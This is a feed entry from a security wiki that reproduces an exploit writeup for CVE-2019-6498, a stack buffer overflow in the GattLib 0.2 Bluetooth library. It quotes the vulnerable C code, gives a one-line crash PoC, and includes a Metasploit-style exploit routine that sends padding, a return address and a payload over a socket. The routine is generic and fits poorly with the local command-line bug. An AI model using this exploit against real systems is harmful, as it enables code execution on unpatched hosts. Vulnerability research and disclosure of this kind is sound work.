https://pwnwiki.com/index.php?action=history&feed=atom&title=GattLib_0.2_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
GattLib 0.2 緩衝區溢出漏洞 - Revision history
2026-04-09T04:00:32Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=GattLib_0.2_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=2045&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> Exploit Title: stack-based overflow # Date: 2019-11-21 # Exploit Author: Dhiraj Mishra # Vendor Homepage: http://labapart.com/ # Software Link: https://github.co..."
2021-05-02T05:09:49Z
<p>Created page with "==EXP== <pre> Exploit Title: stack-based overflow # Date: 2019-11-21 # Exploit Author: Dhiraj Mishra # Vendor Homepage: http://labapart.com/ # Software Link: https://github.co..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
Exploit Title: stack-based overflow<br />
# Date: 2019-11-21<br />
# Exploit Author: Dhiraj Mishra<br />
# Vendor Homepage: http://labapart.com/<br />
# Software Link: https://github.com/labapart/gattlib/issues/81<br />
# Version: 0.2<br />
# Tested on: Linux 4.15.0-38-generic<br />
# CVE: CVE-2019-6498<br />
# References:<br />
# https://github.com/labapart/gattlib/issues/81<br />
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6498<br />
<br />
## Summary:<br />
While fuzzing gattlib (Gattlib is a library to access GATT information from<br />
BLE (Bluetooth Low Energy) devices) using clang 6.0 with ASAN a stack-based<br />
buffer-overflow was observed.<br />
<br />
## Vulnerable code from gattlib.c<br />
// Transform string from 'DA:94:40:95:E0:87' to 'dev_DA_94_40_95_E0_87'<br />
strncpy(device_address_str, dst, sizeof(device_address_str));<br />
for (i = 0; i < strlen(device_address_str); i++) {<br />
if (device_address_str[i] == ':') {<br />
device_address_str[i] = '_';<br />
}<br />
}<br />
<br />
## Vulnerable code from discover.c<br />
if (argc != 2) {<br />
printf("%s <device_address>\n", argv[0]);<br />
return 1;<br />
}<br />
<br />
connection = gattlib_connect(NULL, argv[1], BDADDR_LE_PUBLIC, BT_SEC_LOW,<br />
0, 0);<br />
if (connection == NULL) {<br />
fprintf(stderr, "Fail to connect to the bluetooth device.\n");<br />
return 1;<br />
}<br />
<br />
## PoC<br />
<br />
./discover `python -c 'print "A"*20'`<br />
<br />
## MSF code<br />
<br />
def exploit<br />
connect<br />
<br />
print_status("Sending #{payload.encoded.length} byte payload...")<br />
<br />
# Building the buffer for transmission<br />
buf = "A" * 20<br />
buf += [ target.ret ].pack('V')<br />
buf += payload.encoded<br />
<br />
sock.put(buf)<br />
sock.get<br />
<br />
handler<br />
end<br />
<br />
</pre></div>
Pwnwiki